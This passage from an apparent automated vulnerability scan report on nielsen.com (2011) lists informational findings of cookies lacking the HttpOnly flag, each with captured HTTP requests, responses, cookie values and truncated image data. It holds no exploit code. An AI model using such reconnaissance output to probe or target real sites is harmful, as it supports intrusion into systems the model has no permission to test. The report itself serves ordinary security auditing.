User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3Dmobile%20tv%20internet%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7CTAGCLOUD%3A%3D%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 404 Not Found
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bin/statistics/tracker/result was not found on this
...[SNIP]...

4.9. http://nielsen.com/content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:59 GMT
ETag: "e7805b-1237-4ad7b8ca440c0"
Accept-Ranges: bytes
Content-Length: 4663
Content-Type: image/png

.PNG
.
...IHDR.......F.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[ypSg.....-K...K....C .....dI...@f.2.Ij*;..[[.......kgvg...B8..`.....b..dl.lI.d..lI.e....-.....0..\..r}zG.~......OH0.
...[SNIP]...

4.10. http://nielsen.com/content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:41:19 GMT
ETag: "be80e9-4fc5-4ad7c1ce285c0"
Accept-Ranges: bytes
Content-Length: 20421
Content-Type: image/jpeg

......JFIF.............C......................
.....
...
.................................C.......    ..    ............................................................X.."..............................
...[SNIP]...

4.11. http://nielsen.com/content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/television-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.2.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:49 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:04:20 GMT
ETag: "e7813e-4ab4-4ad7b989f4500"
Accept-Ranges: bytes
Content-Length: 19124
Content-Type: image/jpeg

......JFIF.............C......................
.....
...
.................................C.......    ..    ............................................................X.."..............................
...[SNIP]...

4.12. http://nielsen.com/content/corporate/us/en/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/search.html?q=mobile+tv+internet HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 49920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.13. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search/_jcr_content/par.autocomp.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/search/_jcr_content/par.autocomp.html?q=mobile%20t&caller=queryhead HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 385

<div class="search section">


{[Top U.S. Markets for Mobile
, to Acquire Telephia, Inc., The
, to Measure The Mobile Media
, Mobile And Mediamark Research &amp;
, TV, Internet and Mobile Usage
, M
...[SNIP]...

4.14. http://nielsen.com/content/cus_config/favicons/corporate/us/en/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/cus_config/favicons/corporate/us/en/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/cus_config/favicons/corporate/us/en/favicon.ico HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e78050-57e-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon

..............h.......(....... .........................................................................................................#...#.../...0...0...1...2...5...6...C...E...D...D...F...J...M...
...[SNIP]...

4.15. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:58 GMT
ETag: "e78099-99-4ad7b90288580"
Accept-Ranges: bytes
Content-Length: 153
Content-Type: image/gif

GIF89a..(...._..D.....*..[.....Y...........1.....V..`..^..
..=..%..7..P..J...................................!.......,......(......4..LT.I..%."<.Q.x..!.;

4.16. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:58 GMT
ETag: "e78098-169-4ad7b90288580"
Accept-Ranges: bytes
Content-Length: 361
Content-Type: image/png

.PNG
.
...IHDR.......(......h`E....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...3PLTE.....................................................P.....IDATx.b`.. .F..b... ....b... .6..b`.. ....b...
...[SNIP]...

4.17. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:54 GMT
ETag: "be80b3-fb-4ad7c1b650d80"
Accept-Ranges: bytes
Content-Length: 251
Content-Type: image/png

.PNG
.
...IHDR...    ..........E.R....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...<PLTE...............#............................................DbJ....EIDATx.b`bb....bb.. . ....cg.. .6VfFFF.
...[SNIP]...

4.18. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/right_arrow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/right_arrow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/right_arrow.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e7804d-100-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 256
Content-Type: image/png

.PNG
.
...IHDR...    ...    ......O."....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE...............................:.....
tRNS............,....RIDATx.b.....b... . ..,&V ..@....L..L.....d110.
...[SNIP]...

4.19. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/email-link.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/email-link.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/email-link.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806b-65c-4ad7c1a526500"
Accept-Ranges: bytes
Content-Length: 1628
Content-Type: image/gif

GIF89a . ......0..................................."..9..5..l.....}..^..d..A..$..-.....v..e..:..P..,..8..B...........+..)..R..&...........4........K..E........5........L.....-.....e..6..-..{........C.
...[SNIP]...

4.20. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/facebook.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/facebook.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:52 GMT
ETag: "be80ab-62a-4ad7c1b468900"
Accept-Ranges: bytes
Content-Length: 1578
Content-Type: image/gif

GIF89a . .......(d.
R..`.......Is....;l........3}...O......U....x......U.......5f..^. b....Rz..]....4r.n..b...Z.}..b..9v.%V.w.....,\.Jw.<j....c..............@v."^....x..~..0f..G.......5e.....>..Y....O
...[SNIP]...

4.21. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e78043-652-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 1618
Content-Type: image/gif

GIF89a . ..........D..a.....4...L.U.....t......q.......y..<v.U.....+......X..a........].9...n....;{....c.....)}.F.....g.....I......o..g.
l.......*.................u..&..)............g....-.....r......
...[SNIP]...

4.22. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/search.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/search.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/search.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806c-c2b-4ad7c1a526500"
Accept-Ranges: bytes
